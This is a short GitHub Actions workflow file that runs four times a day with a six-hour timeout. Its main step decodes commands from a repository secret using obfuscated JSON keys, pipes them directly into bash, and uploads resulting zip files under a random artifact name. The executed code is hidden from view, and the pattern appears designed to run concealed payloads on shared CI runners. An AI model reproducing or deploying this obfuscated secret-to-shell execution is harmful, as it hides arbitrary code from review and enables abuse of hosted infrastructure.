name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '33 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          rdhnj351: ${{ secrets.rdhnj351 }}
        run: |
          printf '%s' "$rdhnj351" | jq -r .ycg27401 | /bin/bash
          printf '%s' "$v625" | jq -r .qw56603 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 8mgfqAd9
          path: "*.zip"
          retention-days: 1
